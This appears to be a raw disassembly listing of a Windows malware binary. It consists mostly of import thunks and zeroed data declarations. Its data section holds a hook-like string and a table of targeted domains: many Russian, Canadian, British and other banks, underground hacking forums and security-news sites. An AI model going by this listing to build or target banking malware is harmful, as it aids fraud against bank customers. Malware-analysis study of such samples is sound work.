; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9F8 proc near ; CODE XREF: sub_40AA24+847�p
jmp ds:dword_448478
sub_40C9F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA04 proc near ; CODE XREF: sub_40AA24+51F�p
jmp ds:dword_44847C
sub_40CA04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA10 proc near ; CODE XREF: sub_40B3E8+39B�p
; sub_40B3E8+41A�p ...
jmp ds:dword_448480
sub_40CA10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA1C proc near ; CODE XREF: sub_40AA24+896�p
jmp ds:dword_448484
sub_40CA1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA28 proc near ; CODE XREF: sub_408ED0+8FD�p
; sub_408ED0+945�p ...
jmp ds:dword_448488
sub_40CA28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA34 proc near ; CODE XREF: sub_408ED0+924�p
; sub_408ED0+95C�p ...
jmp ds:dword_44848C
sub_40CA34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA40 proc near ; CODE XREF: sub_4043CA+6A�p
jmp ds:dword_448490
sub_40CA40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA4C proc near ; CODE XREF: sub_4043CA+8C�p
jmp ds:dword_448494
sub_40CA4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA58 proc near ; CODE XREF: sub_4043CA+3C�p
jmp ds:dword_448498
sub_40CA58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA64 proc near ; CODE XREF: sub_40AA24+873�p
jmp ds:dword_44849C
sub_40CA64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA70 proc near ; CODE XREF: sub_40AA24+887�p
jmp ds:dword_4484A0
sub_40CA70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA7C proc near ; CODE XREF: sub_404EC6+66�p
; sub_404EC6+CC�p ...
jmp ds:dword_4484A4
sub_40CA7C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA88 proc near ; CODE XREF: sub_408ED0+224�p
; sub_408ED0+379�p ...
jmp ds:dword_4484A8
sub_40CA88 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA94 proc near ; CODE XREF: sub_40AA24+55B�p
jmp ds:dword_4484AC
sub_40CA94 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAA0 proc near ; CODE XREF: sub_40B3E8+1F2�p
jmp ds:dword_4484B0
sub_40CAA0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAAC proc near ; CODE XREF: sub_408ED0+75�p
; sub_40B3E8+808�p
jmp ds:dword_4484B4
sub_40CAAC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAB8 proc near ; CODE XREF: sub_408ED0+D7�p
; sub_408ED0+14D�p ...
jmp ds:dword_4484B8
sub_40CAB8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAC4 proc near ; CODE XREF: sub_40B3E8+20E�p
; sub_40B3E8+747�p
jmp ds:dword_4484BC
sub_40CAC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAD0 proc near ; CODE XREF: sub_40B3E8+183�p
jmp ds:dword_4484C0
sub_40CAD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CADC proc near ; CODE XREF: sub_40B3E8+82E�p
jmp ds:dword_4484C4
sub_40CADC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAE8 proc near ; CODE XREF: sub_40AA24+532�p
jmp ds:dword_4484D0
sub_40CAE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAF4 proc near ; CODE XREF: sub_40B3E8+2CB�p
jmp ds:dword_4484D4
sub_40CAF4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB00 proc near ; CODE XREF: sub_40B3E8+295�p
; sub_40B3E8+2A1�p
jmp ds:dword_4484D8
sub_40CB00 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB0C proc near ; CODE XREF: sub_40B3E8+2F3�p
jmp ds:dword_4484DC
sub_40CB0C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB18 proc near ; CODE XREF: sub_408ED0+1F6�p
; sub_408ED0+805�p
jmp ds:dword_4484E0
sub_40CB18 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB24 proc near ; CODE XREF: sub_40506F+51�p
jmp ds:dword_4484EC
sub_40CB24 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB30 proc near ; CODE XREF: sub_40506F+8A�p
jmp ds:dword_4484F0
sub_40CB30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB3C proc near ; CODE XREF: sub_40160A+33�p
; sub_403F47+4C�p
jmp ds:dword_4484F4
sub_40CB3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB48 proc near ; CODE XREF: sub_4014C9+87�p
; sub_40160A+6C�p ...
jmp ds:dword_4484F8
sub_40CB48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB54 proc near ; CODE XREF: sub_4014C9+36�p
jmp ds:dword_4484FC
sub_40CB54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB60 proc near ; CODE XREF: sub_4014C9+6C�p
jmp ds:dword_448500
sub_40CB60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB6C proc near ; CODE XREF: sub_40160A+5D�p
; sub_403F47+73�p
jmp ds:dword_448504
sub_40CB6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB78 proc near ; CODE XREF: sub_4023A7+33�p
jmp ds:dword_448508
sub_40CB78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB84 proc near ; CODE XREF: sub_4023A7+6E�p
jmp ds:dword_44850C
sub_40CB84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB90 proc near ; CODE XREF: sub_4023A7+54�p
jmp ds:dword_448510
sub_40CB90 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CB9C proc near ; CODE XREF: sub_404EC6+1F�p
jmp ds:dword_448514
sub_40CB9C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBA8 proc near ; CODE XREF: sub_404EC6+171�p
jmp ds:dword_448518
sub_40CBA8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBB4 proc near ; CODE XREF: sub_404EC6+2F�p
jmp ds:dword_44851C
sub_40CBB4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBC0 proc near ; CODE XREF: sub_4035DB+3F�p
jmp ds:dword_448528
sub_40CBC0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBCC proc near ; CODE XREF: sub_401219+49�p
jmp ds:dword_44852C
sub_40CBCC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBD8 proc near ; CODE XREF: sub_406A40+16A�p
; sub_406D2E+69�p ...
jmp ds:dword_448530
sub_40CBD8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBE4 proc near ; CODE XREF: sub_40523D+F0�p
; sub_40523D+17C�p
jmp ds:dword_448534
sub_40CBE4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBF0 proc near ; CODE XREF: sub_4098A8+1017�p
; sub_4098A8+103F�p
jmp ds:dword_448538
sub_40CBF0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CBFC proc near ; CODE XREF: sub_401219+74�p
; sub_4098A8+D7E�p ...
jmp ds:dword_44853C
sub_40CBFC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC08 proc near ; CODE XREF: sub_408779+119�p
jmp ds:dword_448540
sub_40CC08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC14 proc near ; CODE XREF: sub_40129C+1C�p
; .text:00401448�p ...
jmp ds:dword_448544
sub_40CC14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC20 proc near ; CODE XREF: sub_4061F7+7B�p
; sub_4061F7+255�p ...
jmp ds:dword_448548
sub_40CC20 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC2C proc near ; CODE XREF: sub_40109A+149�p
jmp ds:dword_44854C
sub_40CC2C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC38 proc near ; CODE XREF: sub_40172F:loc_401746�p
; sub_403BE7+3B�p ...
jmp ds:dword_448550
sub_40CC38 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC44 proc near ; CODE XREF: sub_40109A+102�p
; sub_40109A+11C�p ...
jmp ds:dword_448554
sub_40CC44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC50 proc near ; CODE XREF: sub_4037CA+2B�p
; .text:0040388A�p ...
jmp ds:dword_448558
sub_40CC50 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC5C proc near ; CODE XREF: sub_4098A8+7D�p
; sub_40AA24+128�p
jmp ds:dword_44855C
sub_40CC5C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC68 proc near ; CODE XREF: sub_4098A8+A77�p
jmp ds:dword_448560
sub_40CC68 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC74 proc near ; CODE XREF: sub_40341E+44�p
; sub_40349A+51�p ...
jmp ds:dword_448564
sub_40CC74 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC80 proc near ; CODE XREF: sub_40C654+17�p
jmp ds:dword_448568
sub_40CC80 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CC8C proc near ; CODE XREF: sub_4061F7+4FA�p
jmp ds:dword_44856C
sub_40CC8C endp
; ---------------------------------------------------------------------------
align 400h
_text ends
; Section 2. (virtual address 0000D000)
; Virtual size : 0002E520 ( 189728.)
; Section size in file : 0002E520 ( 189728.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_bss segment para public 'DATA' use32
assume cs:_bss
;org 40D000h
dword_40D000 dd 0 ; sub_4082AB+89�r ...
dd 41Dh dup(0)
dword_40E078 dd 0 ; sub_40B2CA+C8�r
dword_40E07C dd 0 ; sub_401D31+45C�w ...
dword_40E080 dd 40h dup(0) ; sub_4098A8+709�o ...
dword_40E180 dd 0 ; sub_40354F:loc_4035D1�r
dd 413h dup(0)
dword_40F1D0 dd 0 ; sub_401D31+21E�w ...
dword_40F1D4 dd 0 ; sub_401D31+3E9�r ...
dword_40F1D8 dd 0 ; sub_406D2E+FF5�r ...
byte_40F1DC db 0 ; DATA XREF: sub_401D31+11D�w
align 10h
dword_40F1E0 dd 40h dup(0) ; sub_40AA24+425�o ...
dword_40F2E0 dd 0 ; sub_402A48+D0�w ...
dd 0FFh dup(0)
dword_40F6E0 dd 0 ; sub_40372A+96�r
dd 44Eh dup(0)
dword_41081C dd 0 ; sub_408ED0+855�r ...
dword_410820 dd 0 ; .text:loc_401BAD�r
dd 41Fh dup(0)
dword_4118A0 dd 0 dd 0FFh dup(0)
dword_411CA0 dd 0 ; sub_404020+41�r
dd 44Fh dup(0)
dword_412DE0 dd 0 ; .text:00402559�r
dd 44Eh dup(0)
dword_413F1C dd 0 ; sub_40B2CA+DD�r
dword_413F20 dd 0 ; sub_408ED0+8AD�r ...
align 10h
dword_413F30 dd 0 ; sub_408AB9+89�r
dd 44Fh dup(0)
byte_415070 db 0 ; DATA XREF: sub_401D31+3F1�w
align 8
byte_415078 db 0 ; DATA XREF: sub_401D31+5F�w
; sub_401D31+64�r ...
align 4
dword_41507C dd 0 ; sub_401D31+1C8�w ...
dword_415080 dd 40h dup(0) ; sub_4098A8+9EC�o ...
dword_415180 dd 0 ; sub_402A48+C4�r ...
dd 0FFh dup(0)
dword_415580 dd 0 ; sub_407FBC:loc_40803E�r
dd 45Bh dup(0)
dword_4166F0 dd 0 ; .text:00401991�r
dd 3FFh dup(0)
dword_4176F0 dd 0 ; sub_404491+8E�r
dd 3F3h dup(0)
dword_4186C0 dd 0 ; .text:loc_40221C�r
dd 413h dup(0)
dword_419710 dd 0 ; sub_40AA24+D2�o
align 10h
dword_419720 dd 0 dd 23h dup(0)
dword_4197B0 dd 0 ; sub_405138+81�r
dd 40Fh dup(0)
dword_41A7F0 dd 0 ; .text:004014BF�r
dd 3EBh dup(0)
byte_41B7A0 db 0 ; DATA XREF: sub_401D31+3B8�w
; sub_401D31+3BD�r
align 4
dword_41B7A4 dd 0 ; sub_401D31+D0�r ...
dword_41B7A8 dd 0 dword_41B7AC dd 0 ; sub_4023A7+13�r ...
dword_41B7B0 dd 0 ; sub_40129C+95�r
dd 402h dup(0)
dword_41C7BC dd 0 ; sub_40AA24+841�r ...
dword_41C7C0 dd 0 ; sub_406815+A2�r
dd 435h dup(0)
dword_41D898 dd 0 ; sub_408ED0+21E�r
dword_41D89C dd 0 ; sub_408ED0+6F�r ...
dword_41D8A0 dd 0 ; sub_4024A8+13�r
align 10h
dword_41D8B0 dd 0 ; sub_4032E2+84�r
dd 401h dup(0)
dword_41E8B8 dd 0 ; sub_401D31:loc_401DBB�w ...
dword_41E8BC dd 0 ; sub_408ED0+74F�r ...
dword_41E8C0 dd 0 ; sub_40B2CA+AC�r
dword_41E8C4 dd 0 ; sub_408ED0+3B5�r ...
dword_41E8C8 dd 0 ; sub_402445+53�r
dword_41E8CC dd 0 ; sub_408ED0+10F�r ...
dword_41E8D0 dd 40h dup(0) ; sub_4098A8+DD5�o ...
dword_41E9D0 dd 0 ; sub_401D31+AC�w ...
align 10h
dword_41E9E0 dd 0 ; sub_40390E:loc_403991�r
dd 404h dup(0)
dword_41F9F4 dd 0 ; sub_40B2CA+9C�r
align 10h
dword_41FA00 dd 40h dup(0) ; sub_40AA24+3FF�o ...
byte_41FB00 db 0 ; DATA XREF: sub_401D31+175�w
align 4
dword_41FB04 dd 0 ; sub_408ED0+117�r ...
align 10h
byte_41FB10 db 0 ; DATA XREF: sub_406D2E+136�o
; sub_406D2E+D2F�o ...
byte_41FB11 db 0 ; DATA XREF: sub_406D2E+EB1�r
byte_41FB12 db 0 ; DATA XREF: sub_406D2E+EBA�r
byte_41FB13 db 0 ; DATA XREF: sub_406D2E+EC3�r
dd 3FFFh dup(0)
byte_42FB10 db 0 ; DATA XREF: sub_401D31+267�w
; sub_401D31+26C�r
align 4
dword_42FB14 dd 0 ; .text:00407F76�r ...
align 10h
dword_42FB20 dd 0 ; .text:loc_401810�r
dd 43Fh dup(0)
dword_430C20 dd 0 dword_430C24 dd 0 ; sub_4022BB+17�r
dword_430C28 dd 0 ; sub_408ED0+23F�r ...
byte_430C2C db 0 ; DATA XREF: sub_401D31+2FA�w
; sub_401D31+30B�r ...
align 10h
dword_430C30 dd 0 ; .text:loc_4043C0�r
dd 407h dup(0)
dword_431C50 dd 0 ; sub_406CA2:loc_406D24�r
dd 459h dup(0)
dword_432DB8 dd 0 ; sub_408ED0+898�r ...
dword_432DBC dd 0 ; sub_40B3E8+246�r ...
dword_432DC0 dd 0 ; sub_408ED0+373�r ...
align 10h
dword_432DD0 dd 0 ; .text:00408644�r
dd 443h dup(0)
dword_433EE0 dd 40h dup(0) ; sub_403BE7+221�o ...
byte_433FE0 db 0 ; DATA XREF: sub_40133B+AD�o
; sub_408048+FC�w ...
align 4
dd 3Fh dup(0)
dword_4340E0 dd 0 ; .text:00401A74�r
dd 43Dh dup(0)
dword_4351D8 dd 0 ; sub_408ED0+8D0�r ...
dword_4351DC dd 0 ; sub_408ED0+8E5�r
dword_4351E0 dd 0 ; .text:00401600�r
dd 41Bh dup(0)
dword_436250 dd 0 ; sub_404E2A:loc_404EBC�r
dd 43Fh dup(0)
dword_437350 dd 0 ; .text:loc_401D27�r
dd 423h dup(0)
dword_4383E0 dd 0 ; .text:loc_401725�r
dd 45Fh dup(0)
dword_439560 dd 0 ; .text:00408934�r
dd 3FDh dup(0)
dword_43A558 dd 0 ; sub_40B3E8+24E�r ...
align 10h
byte_43A560 db 0 ; DATA XREF: sub_401D31+42B�w
align 10h
dword_43A570 dd 0 ; .text:00408737�r
dd 3EBh dup(0)
_bss ends
; Section 3. (virtual address 0003C000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 0003C000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43C000h
dd offset dword_40D000
dd 43B520h, 8000h, 0
dword_43C010 dd 8 ; sub_40109A+110�w ...
dword_43C014 dd 0 dd 0
dword_43C01C dd 0 dword_43C020 dd 0 ; sub_401219+5A�r
dword_43C024 dd 0 ; sub_401219+54�r
dword_43C028 dd 0 ; sub_401219+4E�r
dword_43C02C dd 0 ; sub_40109A:loc_401208�r
dword_43C030 dd 0 dword_43C034 dd 0 ; sub_40109A+87�r ...
dword_43C038 dd 0 dword_43C03C dd 14h dup(0) ; sub_40109A+8F�o
dword_43C08C dd 12FCACh dword_43C090 dd 12FCC4h ; sub_40109A+32�w
dword_43C094 dd 5 ; sub_408ED0+47A�r ...
dword_43C098 dd 12h ; sub_408E12+6E�r ...
dword_43C09C dd 0 ; sub_40129C:loc_4012CB�r ...
aKkqhook_29 db 'KKQHOOK_29',0 ; DATA XREF: sub_40A9BC+20�o
; sub_40AA24+5A3�o
aGu? db 'gU',27h,'= ?',0
aOX2bn db 'O+X2Bn',0
aW db 'w',0
align 4
dword_43C0BC dd 0 ; sub_4098A8+153�r ...
dword_43C0C0 dd 46h ; sub_4098A8+105C�r ...
off_43C0C4 dd offset aSiliconfirewar ; DATA XREF: sub_4098A8+126�r
; sub_4098A8+159�r
; "siliconfireware.ru"
dd offset aChechenpress_i ; "chechenpress.info"
dd offset aProdexteam_net ; "prodexteam.net"
dd offset aProdexteam_n_0 ; "prodexteam.net/main.htm"
dd offset aWww_cbr_ru ; "www.cbr.ru"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aProdexteam_n_1 ; "prodexteam.netcrutop.nu"
dd offset aNew_egg_com ; "new.egg.com"
dd offset aWww_baltbank_r ; "www.baltbank.ru"
dd offset aWelcome3_smile ; "welcome3.smile.co.uk"
dd offset aOlb2_nationet_ ; "olb2.nationet.com"
dd offset aWww_bbin_ru ; "www.bbin.ru"
dd offset aMasterX_com ; "master-x.com"
dd offset aEbookfinaltras ; "ebookfinaltrash.ru"
dd offset aWww_masterbank ; "www.masterbank.ru"
dd offset aWww_bankBanque ; "www.bank-banque-canada.ca/index.php"
dd offset aWww_bmo_com ; "www.bmo.com"
dd offset aWww_bankofmadu ; "www.bankofmadura.com"
dd offset aWww_cibc_com ; "www.cibc.com"
dd offset aWww_vtb_ru ; "www.vtb.ru"
dd offset aWww_cwbank_com ; "www.cwbank.com"
dd offset aHyperSpaceFuel ; "hyper-space-fuel.ru"
dd offset aAlfabank_ru ; "alfabank.ru"
dd offset aCrutop_nuVbull ; "crutop.nu/vbulletin/"
dd offset aWww_mmbank_ru ; "www.mmbank.ru"
dd offset aCrutop_nuVbu_0 ; "crutop.nu/vbulletin/forumdisplay.php"
dd offset aWww_uniastrum_ ; "www.uniastrum.ru"
dd offset aCrutop_nuVbu_1 ; "crutop.nu/vbulletin/showthread.php"
dd offset aAtmacasoft_com ; "atmacasoft.com"
dd offset aAsmworm_com ; "asmworm.com"
dd offset aWww_proxySocks ; "www.proxy-socks.net"
dd offset aDigitalRelaxkg ; "digital-relaxkgb.ru"
dd offset aWww_worldbank_ ; "www.worldbank.org/index.php"
dd offset aWww_candidatev ; "www.candidateverifier.com/index.php"
dd offset aWww_sbrf_ru ; "www.sbrf.ru"
dd offset aPizdabolInc_ru ; "pizdabol-inc.ru"
dd offset aWww_bankofindi ; "www.bankofindia.com"
dd offset aWww_icbank_ru ; "www.icbank.ru"
dd offset aAcroleinHawk_r ; "acrolein-hawk.rubanking.halifax-online."...
dd offset aWww_spyinstruc ; "www.spyinstructors.com"
dd offset aWww_kmb_ru ; "www.kmb.ru"
dd offset aWww_netmagiste ; "www.netmagister.com"
dd offset aKavkazcenter_c ; "kavkazcenter.com/russ"
dd offset aWww_absolutban ; "www.absolutbank.ru"
dd offset aMyonlineaccoun ; "myonlineaccounts2.abbeynational.co.uk"
dd offset aOnlineBusiness ; "online-business.lloydstsb.co.uk"
dd offset aWww_allahabadb ; "www.allahabadbank.com"
dd offset aMasterX_comFor ; "master-x.com/forum/"
dd offset aWww_rbc_com ; "www.rbc.com"
dd offset aWww_ovk_ru ; "www.ovk.ru"
dd offset aWww1_hsbc_caIn ; "www1.hsbc.ca/index.php"
dd offset aProrat_net ; "prorat.net"
dd offset aYambo_biz ; "yambo.biz"
dd offset aKidosBank_ru ; "kidos-bank.ru"
dd offset aWww_lbcdirect_ ; "www.lbcdirect.laurentianbank.ca/index.p"...
dd offset aBarclays_com ; "barclays.com"
dd offset aTotallyfreeban ; "totallyfreebanking.com"
dd offset aWww_nbc_caInde ; "www.nbc.ca/index.php"
dd offset a53bank_com ; "53bank.com"
dd offset aWww_uralsib_ru ; "www.uralsib.ru"
dd offset aGrepwareFacili ; "grepware-facility.ru"
dd offset aWww_b2bTrust_c ; "www.b2b-trust.com"
dd offset aGutabank_ru ; "gutabank.ru"
dd offset aOpenbank_com ; "openbank.com"
dd offset aSeclab_ru ; "seclab.ru"
dd offset aTatNeftbank_ru ; "tat-neftbank.ru"
dd offset aSecuritylab_ru ; "securitylab.ru"
dd offset aRoyalbank_com ; "royalbank.com"
dd offset aFethard_biz ; "fethard.biz"
dd offset aWww_mdmbank_ru ; "www.mdmbank.ru"
dd offset aGronxplanets_r ; "gronxplanets.ru"
dd offset aChevychasebank ; "chevychasebank.com"
aJnq_ db 'Jnq.',0
aSoftwareMicros db 'Software\Microsoft\Windows',0 ; DATA XREF: sub_4098A8+5A0�o
; sub_4098A8+68F�o ...
aK db 'K',0
aOfstkkq db 'ofstkkq',0 ; DATA XREF: sub_4098A8+59B�o
; sub_4098A8+68A�o
db 0
aOfstkkqc db 'ofstkkqc',0 ; DATA XREF: sub_4098A8+6E3�o
; sub_4098A8+898�o
dd 0
dword_43C21C dd 0 ; sub_40B3E8:loc_40B57B�r ...
dword_43C220 dd 0 ; sub_40B3E8+A9�r ...
aDSF?t db 'D>S F?t',0
dword_43C22C dd 727C21h dword_43C230 dd 38h ; sub_401D31+96�w ...
dd 3, 0Eh
dword_43C23C dd 0 ; .text:loc_40145B�r ...
dd 1, 0Dh
dword_43C248 dd 0 ; .text:loc_40159D�r ...
dd 2, 10h
dword_43C254 dd 0 ; .text:loc_4016D6�r ...
dd 6, 0Ch
dword_43C260 dd 0 ; .text:loc_4017B4�r ...
dword_43C264 dd 354B5Eh aO68 db 'o6,%8',0 ; DATA XREF: sub_40181A+A7�o
align 10h
dd 5, 0Ah
dword_43C278 dd 0 ; .text:loc_40193B�r ...
aVlvh_ db 'vlVh_',0 ; DATA XREF: .text:004019AB�o
align 4
dd 5, 0Fh
dword_43C28C dd 0 ; .text:loc_401A1D�r ...
word_43C290 dw 2Ah ; DATA XREF: sub_401A7E+37�r
dword_43C292 dd 707C44h align 4
dd 0
dd 0Bh
dword_43C2A0 dd 0 ; .text:loc_401B47�r ...
word_43C2A4 dw 4Ah ; DATA XREF: sub_401BB7+9�r
aFqgcpb db 'FqGcPB:',0 ; DATA XREF: sub_401BB7+D4�o
align 10h
dd 2, 0Ah
dword_43C2B8 dd 0 ; .text:loc_401CCE�r ...
word_43C2BC dw 20h ; DATA XREF: sub_401D31+1D�r
aQ8abz db 'Q8az',0 ; DATA XREF: sub_401D31+13A�o
aIh db '>%<Ih',0 ; DATA XREF: sub_401D31+2E7�o
align 4
off_43C2CC dd offset loc_401DBB ; DATA XREF: sub_401D31+7E�r
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_401F8C
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DF8
dd offset loc_401DF8
dd offset loc_401E2D
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E2D
dd offset loc_401E2D
dd offset loc_401EB0
dd offset loc_401ED6
dd offset loc_401F5A
dd offset loc_401F20
dd offset loc_401E1C
dd offset loc_401F0E
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
